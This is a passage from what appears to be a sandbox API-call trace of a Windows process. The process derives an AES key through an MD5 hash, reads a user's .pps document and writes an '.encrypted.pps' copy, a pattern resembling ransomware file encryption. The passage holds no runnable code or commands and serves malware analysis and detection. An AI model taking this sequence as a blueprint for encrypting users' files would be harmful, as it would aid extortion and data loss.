ftLastWriteTime.dwLowDateTime=0x64701b50, ftLastWriteTime.dwHighDateTime=0x1d5c528, nFileSizeHigh=0x0, nFileSizeLow=0xa240, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="M6n9gNS1E7rNH.pps", cAlternateFileName="M6N9GN~1.PPS")) returned 0x7c2240 [0033.637] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.637] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.637] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.638] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.639] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.639] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.639] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.639] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.639] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.639] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.640] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.641] CryptHashData (hHash=0x7c2100, pbData=0x7c7768, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.641] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.641] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.642] CryptDestroyHash (hHash=0x7c2100) returned 1 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\m6n9gns1e7rnh.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.642] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.642] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.encrypted.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\m6n9gns1e7rnh.encrypted.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.643] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.643] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xa240, lpOverlapped=0x0) returned 1 [0033.645] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa240) returned 0x8affc0 [0033.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.646] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.647] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.647] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.647] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.647] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.648] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.648] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.648] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 